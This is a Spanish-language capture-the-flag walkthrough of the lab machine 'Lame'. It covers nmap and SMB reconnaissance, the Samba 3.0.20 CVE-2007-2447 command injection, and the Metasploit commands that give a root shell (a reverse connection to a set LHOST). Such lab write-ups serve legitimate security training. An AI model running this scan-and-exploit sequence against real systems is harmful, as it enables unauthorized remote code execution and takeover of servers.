Lame

✍️ Autor: ch4p 🔍 Dificultad: Fácil 📅 Fecha de creación: 14/03/2017

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.10.3

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sC -sV 10.10.10.3

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Durante el escaneo se identificaron los siguientes puertos abiertos:

  • 21 (FTP): Protocolo de transferencia de archivos, puede permitir el acceso anónimo o credenciales débiles.

  • 22 (SSH): Servicio de acceso remoto seguro, posible vector de ataque si se detectan credenciales débiles o exploits disponibles.

  • 139, 445 (SMB): Protocolos de compartición de archivos en redes Windows, potencialmente expuestos a vulnerabilidades como SMB Relay o EternalBlue.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p21,22,139,445 -v 10.10.10.3

para que nos proporcione más información sobre esos puertos específicamente.

Revisamos el puerto 21 con el usuario Anonymous.

ftp 10.10.10.3

No contiene nada.

Miramos el protocolo SMB.

smbmap -H 10.10.10.3

Vemos si es explotable a algún CVE.

nmap -p 445 --script smb-os-discovery,smb-protocols,smb2-capabilities 10.10.10.3

Dado que el sistema usa Samba 3.0.20, hay una vulnerabilidad conocida que permite ejecución remota de código (RCE).

CVE-2007-2447 – Samba "username map script" Command Injection: Esta vulnerabilidad permite ejecutar comandos arbitrarios en el servidor Samba si la opción "username map script" está habilitada en smb.conf.

🚀 EXPLOTACIÓN

Abrimos Metasploit para explotar esta vulnerabilidad.

search Samba 3.0.20
use 0
show options
set RHOSTS 10.10.10.3
set RPORT 445
set LHOST 10.10.14.7
run

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

Somos root.

Last updated

Was this helpful?